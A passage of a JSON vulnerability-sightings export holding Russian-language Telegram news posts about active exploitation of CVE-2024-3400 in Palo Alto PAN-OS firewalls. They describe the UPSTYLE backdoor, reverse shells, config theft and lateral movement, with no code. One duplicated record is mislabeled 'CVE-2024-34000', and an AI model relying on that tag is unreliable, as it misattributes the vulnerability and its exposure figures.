\u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0438\u043b\u0438 \u043c\u0435\u0440\u044b \u043f\u043e \u0441\u043c\u044f\u0433\u0447\u0435\u043d\u0438\u044e \u043f\u043e\u0441\u043b\u0435\u0434\u0441\u0442\u0432\u0438\u0439, \u043d\u043e Siemens \u043d\u0438\u0447\u0435\u0433\u043e \u043d\u0435 \u0443\u043f\u043e\u043c\u0438\u043d\u0430\u0435\u0442 \u043e\u0431 \u0430\u0442\u0430\u043a\u0430\u0445, \u043a\u043e\u043d\u043a\u0440\u0435\u0442\u043d\u043e \u043d\u0430\u0446\u0435\u043b\u0435\u043d\u043d\u044b\u0445 \u043d\u0430 \u0435\u0435 \u043f\u0440\u043e\u0434\u0443\u043a\u0442.\n\n\u041d\u043e \u044d\u0442\u043e \u0432\u0440\u0435\u043c\u0435\u043d\u043d\u043e, \u0443\u0447\u0438\u0442\u044b\u0432\u0430\u044f, \u0447\u0442\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043d\u0435\u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u043c\u0443 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0435 \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u0441 \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u043d\u044b\u043c\u0438 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u044f\u043c\u0438 \u043d\u0430 \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u043c \u0431\u0440\u0430\u043d\u0434\u043c\u0430\u0443\u044d\u0440\u0435, \u0430 \u043f\u043e\u0441\u043b\u0435 \u0432\u044b\u0445\u043e\u0434\u0430 PoC \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0440\u0435\u0437\u043a\u043e \u0441\u043a\u0430\u043a\u043d\u0443\u043b\u0430 \u0432\u0432\u0435\u0440\u0445.\n\n\u041f\u0440\u0438 \u0442\u043e\u043c, \u0447\u0442\u043e \u043f\u043e \u0434\u0430\u043d\u043d\u044b\u043c Shadowserver Foundation, \u043c\u0435\u0436\u0441\u0435\u0442\u0435\u0432\u044b\u0445 \u044d\u043a\u0440\u0430\u043d\u043e\u0432 Palo Alto Networks, \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u0434\u043b\u044f \u0430\u0442\u0430\u043a \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c CVE-2024-3400 \u0438 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0445 \u0432 \u0441\u0435\u0442\u0438, \u0432\u0441\u0435 \u0435\u0449\u0435 \u0434\u043e\u0441\u0442\u0438\u0433\u0430\u0435\u0442 \u043f\u043e\u0447\u0442\u0438 6000.\n\n\u0422\u0430\u043a \u0447\u0442\u043e \u0431\u0443\u0434\u0435\u043c \u043f\u043e\u0441\u043c\u043e\u0442\u0440\u0435\u0442\u044c.", "creation_timestamp": "2024-04-23T15:14:48.000000Z"}, {"uuid": "cef2f222-fc00-45a2-812f-de0bd933efbc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "published-proof-of-concept", "source": "Telegram/KV7AWjEt6Axf1Kt1VPSjg6JsxfqmlgwLB0_e8ED9lGU96D8", "content": "", "creation_timestamp": "2024-04-12T09:52:38.000000Z"}, {"uuid": "52b5197f-a32d-432f-b502-1aaf80d36d48", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-34000", "type": "exploited", "source": "https://t.me/true_secator/5648", "content": "\u041a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0431\u0440\u0430\u043d\u0434\u043c\u0430\u0443\u044d\u0440\u0430 PAN-OS \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 Palo Alto Networks \u043e\u0431\u0437\u0430\u0432\u0435\u043b\u0430\u0441\u044c \u0440\u0430\u0431\u043e\u0447\u0438\u043c \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u043c \u0438 \u0442\u0435\u043f\u0435\u0440\u044c \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u0440\u0435\u0430\u043b\u0438\u0437\u0443\u0435\u0442\u0441\u044f \u0432 \u0430\u0442\u0430\u043a\u0430\u0445, \u0430 \u043c\u0435\u0440\u044b \u043f\u043e \u0441\u043c\u044f\u0433\u0447\u0435\u043d\u0438\u044e \u043e\u043a\u0430\u0437\u0430\u043b\u0438\u0441\u044c \u043d\u0435\u044d\u0444\u0444\u0435\u043a\u0442\u0438\u0432\u043d\u044b\u043c\u0438.\n\n\u041a\u0430\u043a \u0440\u0430\u043d\u0435\u0435 \u043c\u044b \u0441\u043e\u043e\u0431\u0449\u0430\u043b\u0438, CVE-2024-3400 \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u0442\u044c \u043d\u0435\u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434 \u043f\u043e\u0434 root \u043f\u043e\u0441\u0440\u0435\u0434\u0441\u0442\u0432\u043e\u043c \u0432\u043d\u0435\u0434\u0440\u0435\u043d\u0438\u044f \u043a\u043e\u043c\u0430\u043d\u0434 \u0432 \u0430\u0442\u0430\u043a\u0430\u0445 \u043d\u0438\u0437\u043a\u043e\u0439 \u0441\u043b\u043e\u0436\u043d\u043e\u0441\u0442\u0438 \u043d\u0430 PAN-OS 10.2, PAN-OS 11.0 \u0438 PAN-OS 11.1.\n\n\u0427\u0435\u0440\u0435\u0437 \u0434\u0435\u043d\u044c \u043f\u043e\u0441\u043b\u0435 \u0442\u043e\u0433\u043e, \u043a\u0430\u043a Palo Alto Networks \u043d\u0430\u0447\u0430\u043b\u0430 \u0432\u044b\u043f\u0443\u0441\u043a\u0430\u0442\u044c \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0434\u043b\u044f CVE-2024-3400, watchTowr Labs \u0442\u0430\u043a\u0436\u0435 \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b\u0430\u00a0\u043f\u043e\u0434\u0440\u043e\u0431\u043d\u044b\u0439 \u0430\u043d\u0430\u043b\u0438\u0437 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438\u00a0\u0438 \u044d\u043a\u0441\u043f\u0435\u0440\u0438\u043c\u0435\u043d\u0442\u0430\u043b\u044c\u043d\u044b\u0439 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043c\u043e\u0436\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u043d\u0430 \u043d\u0435\u043f\u0440\u043e\u043f\u0430\u0442\u0447\u0435\u043d\u043d\u044b\u0445 \u0431\u0440\u0430\u043d\u0434\u043c\u0430\u0443\u044d\u0440\u0430\u0445.\n\n\u0418 \u044d\u0442\u043e \u043f\u0440\u0438 \u0442\u043e\u043c, \u0447\u0442\u043e \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u0431\u043e\u043b\u0435\u0435 82 000\u00a0\u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u0434\u043b\u044f \u0430\u0442\u0430\u043a CVE-2024-34000 \u044d\u043a\u0437\u0435\u043c\u043f\u043b\u044f\u0440\u043e\u0432, 40% \u0438\u0437 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u043d\u0430\u0445\u043e\u0434\u0438\u043b\u0438\u0441\u044c \u0432 \u0421\u0428\u0410.\n\n\u0420\u0430\u0431\u043e\u0447\u0438\u043c \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u043c, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0438\u043c \u0437\u0430\u0433\u0440\u0443\u0437\u0438\u0442\u044c \u0444\u0430\u0439\u043b \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 \u0431\u0440\u0430\u043d\u0434\u043c\u0430\u0443\u044d\u0440\u0430, \u043f\u043e\u0434\u0435\u043b\u0438\u043b\u0438\u0441\u044c TrustedSec, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u0435\u0433\u043e \u0432 \u0445\u043e\u0434\u0435 \u0440\u0430\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f \u0440\u0435\u0430\u043b\u044c\u043d\u044b\u0445 \u0430\u0442\u0430\u043a, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0438\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0437\u0430\u0433\u0440\u0443\u0437\u0438\u0442\u044c \u0444\u0430\u0439\u043b \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 \u0431\u0440\u0430\u043d\u0434\u043c\u0430\u0443\u044d\u0440\u0430.\n\n\u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, Palo Alto Networks \u0432\u044b\u044f\u0441\u043d\u0438\u043b\u0438, \u0447\u0442\u043e \u0440\u0430\u043d\u0435\u0435 \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u043c\u0435\u0440\u044b \u043f\u043e \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044e \u043f\u043e\u0441\u043b\u0435\u0434\u0441\u0442\u0432\u0438\u0439 \u043e\u043a\u0430\u0437\u0430\u043b\u0438\u0441\u044c \u043d\u0435\u044d\u0444\u0444\u0435\u043a\u0442\u0438\u0432\u043d\u044b\u043c\u0438 \u0434\u043b\u044f \u0437\u0430\u0449\u0438\u0442\u044b \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432 \u043e\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438.\n\n\u0417\u0430\u044f\u0432\u043b\u0435\u043d\u043d\u043e\u0435 \u043e\u0442\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u0435 \u0442\u0435\u043b\u0435\u043c\u0435\u0442\u0440\u0438\u0438 \u0432 \u0440\u0435\u0430\u043b\u044c\u043d\u043e\u0441\u0442\u0438 \u043d\u0435 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u0430\u0449\u0438\u0442\u0438\u0442\u044c\u0441\u044f \u043e\u0442 \u0430\u0442\u0430\u043a, \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u0442\u043e\u043b\u044c\u043a\u043e \u043b\u0438\u0448\u044c \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0435\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0433\u043e \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044f PAN-OS.", "creation_timestamp": "2024-04-17T16:13:02.000000Z"}, {"uuid": "c9f3675c-1721-45bf-9b45-2cda7029fa33", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "https://t.me/true_secator/5648", "content": "\u041a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0431\u0440\u0430\u043d\u0434\u043c\u0430\u0443\u044d\u0440\u0430 PAN-OS \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 Palo Alto Networks \u043e\u0431\u0437\u0430\u0432\u0435\u043b\u0430\u0441\u044c \u0440\u0430\u0431\u043e\u0447\u0438\u043c \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u043c \u0438 \u0442\u0435\u043f\u0435\u0440\u044c \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u0440\u0435\u0430\u043b\u0438\u0437\u0443\u0435\u0442\u0441\u044f \u0432 \u0430\u0442\u0430\u043a\u0430\u0445, \u0430 \u043c\u0435\u0440\u044b \u043f\u043e \u0441\u043c\u044f\u0433\u0447\u0435\u043d\u0438\u044e \u043e\u043a\u0430\u0437\u0430\u043b\u0438\u0441\u044c \u043d\u0435\u044d\u0444\u0444\u0435\u043a\u0442\u0438\u0432\u043d\u044b\u043c\u0438.\n\n\u041a\u0430\u043a \u0440\u0430\u043d\u0435\u0435 \u043c\u044b \u0441\u043e\u043e\u0431\u0449\u0430\u043b\u0438, CVE-2024-3400 \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u0442\u044c \u043d\u0435\u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434 \u043f\u043e\u0434 root \u043f\u043e\u0441\u0440\u0435\u0434\u0441\u0442\u0432\u043e\u043c \u0432\u043d\u0435\u0434\u0440\u0435\u043d\u0438\u044f \u043a\u043e\u043c\u0430\u043d\u0434 \u0432 \u0430\u0442\u0430\u043a\u0430\u0445 \u043d\u0438\u0437\u043a\u043e\u0439 \u0441\u043b\u043e\u0436\u043d\u043e\u0441\u0442\u0438 \u043d\u0430 PAN-OS 10.2, PAN-OS 11.0 \u0438 PAN-OS 11.1.\n\n\u0427\u0435\u0440\u0435\u0437 \u0434\u0435\u043d\u044c \u043f\u043e\u0441\u043b\u0435 \u0442\u043e\u0433\u043e, \u043a\u0430\u043a Palo Alto Networks \u043d\u0430\u0447\u0430\u043b\u0430 \u0432\u044b\u043f\u0443\u0441\u043a\u0430\u0442\u044c \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0434\u043b\u044f CVE-2024-3400, watchTowr Labs \u0442\u0430\u043a\u0436\u0435 \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b\u0430\u00a0\u043f\u043e\u0434\u0440\u043e\u0431\u043d\u044b\u0439 \u0430\u043d\u0430\u043b\u0438\u0437 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438\u00a0\u0438 \u044d\u043a\u0441\u043f\u0435\u0440\u0438\u043c\u0435\u043d\u0442\u0430\u043b\u044c\u043d\u044b\u0439 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043c\u043e\u0436\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u043d\u0430 \u043d\u0435\u043f\u0440\u043e\u043f\u0430\u0442\u0447\u0435\u043d\u043d\u044b\u0445 \u0431\u0440\u0430\u043d\u0434\u043c\u0430\u0443\u044d\u0440\u0430\u0445.\n\n\u0418 \u044d\u0442\u043e \u043f\u0440\u0438 \u0442\u043e\u043c, \u0447\u0442\u043e \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u0431\u043e\u043b\u0435\u0435 82 000\u00a0\u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u0434\u043b\u044f \u0430\u0442\u0430\u043a CVE-2024-34000 \u044d\u043a\u0437\u0435\u043c\u043f\u043b\u044f\u0440\u043e\u0432, 40% \u0438\u0437 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u043d\u0430\u0445\u043e\u0434\u0438\u043b\u0438\u0441\u044c \u0432 \u0421\u0428\u0410.\n\n\u0420\u0430\u0431\u043e\u0447\u0438\u043c \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u043c, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0438\u043c \u0437\u0430\u0433\u0440\u0443\u0437\u0438\u0442\u044c \u0444\u0430\u0439\u043b \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 \u0431\u0440\u0430\u043d\u0434\u043c\u0430\u0443\u044d\u0440\u0430, \u043f\u043e\u0434\u0435\u043b\u0438\u043b\u0438\u0441\u044c TrustedSec, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u0435\u0433\u043e \u0432 \u0445\u043e\u0434\u0435 \u0440\u0430\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f \u0440\u0435\u0430\u043b\u044c\u043d\u044b\u0445 \u0430\u0442\u0430\u043a, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0438\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0437\u0430\u0433\u0440\u0443\u0437\u0438\u0442\u044c \u0444\u0430\u0439\u043b \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 \u0431\u0440\u0430\u043d\u0434\u043c\u0430\u0443\u044d\u0440\u0430.\n\n\u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, Palo Alto Networks \u0432\u044b\u044f\u0441\u043d\u0438\u043b\u0438, \u0447\u0442\u043e \u0440\u0430\u043d\u0435\u0435 \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u043c\u0435\u0440\u044b \u043f\u043e \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044e \u043f\u043e\u0441\u043b\u0435\u0434\u0441\u0442\u0432\u0438\u0439 \u043e\u043a\u0430\u0437\u0430\u043b\u0438\u0441\u044c \u043d\u0435\u044d\u0444\u0444\u0435\u043a\u0442\u0438\u0432\u043d\u044b\u043c\u0438 \u0434\u043b\u044f \u0437\u0430\u0449\u0438\u0442\u044b \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432 \u043e\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438.\n\n\u0417\u0430\u044f\u0432\u043b\u0435\u043d\u043d\u043e\u0435 \u043e\u0442\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u0435 \u0442\u0435\u043b\u0435\u043c\u0435\u0442\u0440\u0438\u0438 \u0432 \u0440\u0435\u0430\u043b\u044c\u043d\u043e\u0441\u0442\u0438 \u043d\u0435 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u0430\u0449\u0438\u0442\u0438\u0442\u044c\u0441\u044f \u043e\u0442 \u0430\u0442\u0430\u043a, \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u0442\u043e\u043b\u044c\u043a\u043e \u043b\u0438\u0448\u044c \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0435\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0433\u043e \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044f PAN-OS.", "creation_timestamp": "2024-04-17T16:13:02.000000Z"}, {"uuid": "f67702eb-c136-4aeb-b9f8-8de216d0e742", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "https://t.me/true_secator/5637", "content": "10-\u0442\u0438 \u0431\u0430\u043b\u044c\u043d\u0430\u044f 0-day \u0432 \u043c\u0435\u0436\u0441\u0435\u0442\u0435\u0432\u044b\u0445 \u044d\u043a\u0440\u0430\u043d\u0430\u0445 Palo Alto Networks \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u0432 \u0446\u0435\u043b\u0435\u0432\u044b\u0445 \u0430\u0442\u0430\u043a\u0430\u0445 APT, \u043e\u0442\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u043c\u043e\u0439 \u043a\u0430\u043a UTA0218 (\u0438\u043b\u0438 Operation MidnightEclipse).\n\n\u041a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432\u043d\u0435\u0434\u0440\u0435\u043d\u0438\u044f \u043a\u043e\u043c\u0430\u043d\u0434 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0444\u0443\u043d\u043a\u0446\u0438\u044e GlobalProtect VPN \u0432 PAN-OS \u0438 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043d\u0435\u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u043c\u0443 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434 \u0441 \u043f\u0440\u0430\u0432\u0430\u043c\u0438 root \u043d\u0430 \u0431\u0440\u0430\u043d\u0434\u043c\u0430\u0443\u044d\u0440\u0430\u0445 PAN-OS 10.2, PAN-OS 11.0 \u0438 PAN-OS 11.1.\n\nPalo Alto Networks \u043d\u0430\u043c\u0435\u0440\u0435\u043d\u0430 \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u0442\u044c \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f 14 \u0430\u043f\u0440\u0435\u043b\u044f. \u041f\u043e\u043a\u0430 \u0436\u0435 \u0445\u0430\u043a\u0435\u0440\u044b \u0440\u0435\u0430\u043b\u0438\u0437\u0443\u044e\u0442 CVE-2024-3400 \u0434\u043b\u044f \u0432\u0437\u043b\u043e\u043c\u0430 \u0432\u043d\u0443\u0442\u0440\u0435\u043d\u043d\u0438\u0445 \u0441\u0435\u0442\u0435\u0439, \u043a\u0440\u0430\u0436\u0438 \u0434\u0430\u043d\u043d\u044b\u0445 \u0438 \u0443\u0447\u0435\u0442\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445. \n\nAPT-\u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u044c \u0437\u0430\u043c\u0435\u0442\u0438\u043b\u0438 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 Volexity, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043f\u043e\u043b\u0430\u0433\u0430\u044e\u0442, \u0447\u0442\u043e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a, \u0441\u0443\u0434\u044f \u043f\u043e \u0432\u0441\u0435\u043c\u0443, \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0430\u043b \u0438 \u043f\u0440\u043e\u0442\u0435\u0441\u0442\u0438\u0440\u043e\u0432\u0430\u043b \u043d\u0443\u043b\u0435\u0432\u043e\u0439 \u0434\u0435\u043d\u044c \u0435\u0449\u0435 26 \u043c\u0430\u0440\u0442\u0430, \u043d\u043e \u043d\u0435 \u0440\u0430\u0437\u0432\u0435\u0440\u0442\u044b\u0432\u0430\u043b \u043f\u043e\u043b\u0435\u0437\u043d\u0443\u044e \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0443 \u0434\u043e 10 \u0430\u043f\u0440\u0435\u043b\u044f.\n\n\u0420\u0435\u0430\u043b\u044c\u043d\u044b\u0435 \u0430\u0442\u0430\u043a\u0438 \u043d\u0430\u0447\u0430\u043b\u0438\u0441\u044c \u043d\u0430 \u043f\u0440\u043e\u0448\u043b\u043e\u0439 \u043d\u0435\u0434\u0435\u043b\u0435, \u043a\u043e\u0433\u0434\u0430 UTA0218 \u043d\u0430\u0447\u0430\u043b \u0440\u0430\u0437\u0432\u0435\u0440\u0442\u044b\u0432\u0430\u0442\u044c \u0431\u044d\u043a\u0434\u043e\u0440 \u043d\u0430 \u043e\u0441\u043d\u043e\u0432\u0435 Python \u043f\u043e\u0434 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435\u043c UPSTYLE \u043d\u0430 \u0432\u0437\u043b\u043e\u043c\u0430\u043d\u043d\u044b\u0445 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430\u0445.\n\n\u041f\u043e\u043c\u0438\u043c\u043e \u0431\u044d\u043a\u0434\u043e\u0440\u0430, Volexity \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u043b\u0430, \u043a\u0430\u043a \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0434\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u043b\u0438 \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0435 \u043f\u043e\u043b\u0435\u0437\u043d\u044b\u0435 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u0434\u043b\u044f \u0437\u0430\u043f\u0443\u0441\u043a\u0430 \u043e\u0431\u0440\u0430\u0442\u043d\u044b\u0445 \u043e\u0431\u043e\u043b\u043e\u0447\u0435\u043a, \u043a\u0440\u0430\u0436\u0438 \u0434\u0430\u043d\u043d\u044b\u0445 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 PAN-OS, \u0443\u0434\u0430\u043b\u0435\u043d\u0438\u044f \u0444\u0430\u0439\u043b\u043e\u0432 \u0436\u0443\u0440\u043d\u0430\u043b\u043e\u0432, \u0437\u0430\u043f\u0443\u0441\u043a\u0430 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0430 \u0442\u0443\u043d\u043d\u0435\u043b\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f Golang \u043f\u043e\u0434 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435\u043c GOST.\n\n\u0412 \u043e\u0434\u043d\u043e\u0439 \u0438\u0437 \u0430\u0442\u0430\u043a \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b \u0441\u0435\u0440\u0432\u0438\u0441\u043d\u0443\u044e \u0443\u0447\u0435\u0442\u043d\u0443\u044e \u0437\u0430\u043f\u0438\u0441\u044c \u0441 \u0432\u044b\u0441\u043e\u043a\u0438\u043c\u0438 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u044f\u043c\u0438 \u0431\u0440\u0430\u043d\u0434\u043c\u0430\u0443\u044d\u0440\u0430 Palo Alto Networks \u0434\u043b\u044f \u0433\u043e\u0440\u0438\u0437\u043e\u043d\u0442\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u043f\u0435\u0440\u0435\u043c\u0435\u0449\u0435\u043d\u0438\u044f \u0447\u0435\u0440\u0435\u0437 SMB \u0438 WinRM.\u00a0\n\n\u041f\u043e\u0441\u043b\u0435 \u0447\u0435\u0433\u043e \u043f\u043e\u0445\u0438\u0442\u0438\u043b \u043a\u043e\u043d\u0444\u0438\u0434\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0435 \u0444\u0430\u0439\u043b\u044b Windows, \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u0431\u0430\u0437\u0443 